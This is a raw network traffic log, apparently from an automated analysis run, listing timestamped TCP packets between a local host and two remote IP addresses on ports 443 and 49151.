Sep 7, 2021 18:17:01.722549915 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722564936 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722584009 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722600937 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722600937 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722614050 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722625971 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722641945 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722656965 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722671032 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722671986 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722692013 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722698927 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722712040 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722727060 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722732067 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722760916 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722767115 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722778082 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722793102 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722811937 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722830057 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722836018 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722858906 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722866058 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722881079 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722891092 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722898006 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722903013 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722932100 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722938061 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722955942 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722978115 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.722987890 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.722995996 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723004103 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723026991 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723042011 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723048925 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723062038 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723072052 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723090887 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723109007 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723134041 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723146915 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723170996 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723172903 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723210096 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723234892 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723248959 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723256111 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723279953 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723306894 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723330021 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723351002 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723373890 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723397017 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723418951 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723419905 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723442078 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723468065 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723490953 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723511934 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723514080 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723535061 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723556995 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723556995 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723578930 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723589897 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723602057 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723623037 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723634005 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723649025 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723671913 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723695040 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723695040 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723718882 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723741055 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723762035 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723771095 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723783970 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723802090 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723804951 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723828077 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723829985 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723853111 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723871946 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723871946 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723896027 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723908901 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723915100 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723933935 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723943949 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723957062 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723975897 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.723984957 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.723999977 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724024057 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724024057 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724049091 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724057913 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724071980 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724088907 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724090099 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724112034 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724122047 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724133968 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724157095 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724180937 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724183083 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724206924 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724212885 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724231958 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724255085 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724256992 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724278927 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724299908 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724302053 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724324942 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724332094 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724348068 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724373102 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724374056 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724394083 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724412918 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724415064 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724433899 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724436998 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724459887 CEST	443	49706	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:01.724471092 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.724509001 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:01.751256943 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:02.678520918 CEST	49707	49151	192.168.2.5	204.44.86.179
Sep 7, 2021 18:17:02.706022024 CEST	49700	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:02.841203928 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:17:02.841327906 CEST	49707	49151	192.168.2.5	204.44.86.179
Sep 7, 2021 18:17:02.843080044 CEST	49707	49151	192.168.2.5	204.44.86.179
Sep 7, 2021 18:17:03.050124884 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:17:03.200733900 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:17:03.211242914 CEST	49707	49151	192.168.2.5	204.44.86.179
Sep 7, 2021 18:17:03.425122976 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:17:11.702714920 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.720113039 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.720247984 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.762744904 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.779500008 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.780690908 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.781222105 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.782536983 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.782644987 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.792524099 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.809185028 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.810281992 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.810364962 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.862713099 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.883200884 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906702995 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906742096 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906780005 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906806946 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906842947 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906868935 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.906886101 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906923056 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.906924963 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.906999111 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.907017946 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907046080 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907129049 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.907227993 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907268047 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907294035 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907304049 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.907352924 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.907691002 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907730103 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907767057 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907768965 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.907804012 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.907804966 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.907835960 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.907865047 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.908482075 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.908521891 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.908559084 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.908582926 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.908602953 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.908637047 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.908693075 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.909315109 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.909346104 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.909369946 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.909395933 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.909413099 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.909482956 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.910077095 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.910114050 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.910146952 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.910178900 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.910181999 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.910219908 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.910271883 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.911029100 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.911058903 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.911082983 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.911134958 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.911164999 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.911254883 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.911729097 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.911812067 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.926075935 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926125050 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926173925 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926220894 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926222086 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.926265955 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.926316023 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.926321983 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.926409006 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926459074 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926502943 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926518917 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.926542044 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.926546097 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.927196980 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.927258968 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.927283049 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.927584887 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.927627087 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.927664042 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.927675962 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.927680969 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.927736044 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.928003073 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928041935 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928070068 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.928088903 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928112984 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.928131104 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.928133011 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928190947 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.928812981 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928858042 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928894997 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928901911 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.928932905 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.928957939 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.929039001 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.929642916 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.929686069 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.929714918 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.929722071 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.929729939 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.929760933 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.929764986 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.929807901 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.930474043 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.930512905 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.930551052 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.930588961 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.930589914 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.930658102 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.930732012 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.931355953 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.931397915 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.931443930 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.931477070 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.931581974 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.931605101 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.932080984 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.932120085 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.932167053 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.932199955 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.932230949 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.932674885 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.932717085 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.932749033 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.932751894 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.932785988 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.932791948 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.932826042 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.933552980 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.933597088 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.933633089 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.933640003 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.933676958 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.933680058 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.933720112 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.933743954 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.934330940 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.934369087 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.934407949 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.934444904 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.934449911 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.934533119 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.934545994 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.935170889 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.935209036 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.935245037 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.935247898 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.935276985 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.935278893 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.935314894 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.935338020 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.935954094 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936053991 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.936177969 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936219931 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936254025 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936254025 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.936291933 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.936410904 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.936789989 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936821938 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936844110 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936866045 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.936888933 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.936933994 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.936992884 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.937597036 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.937629938 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.937695980 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.937736988 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.945578098 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.945610046 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.945642948 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.945669889 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.945736885 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.945760965 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.945785999 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.945808887 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.945816040 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.945846081 CEST	49708	443	192.168.2.5	162.159.135.233
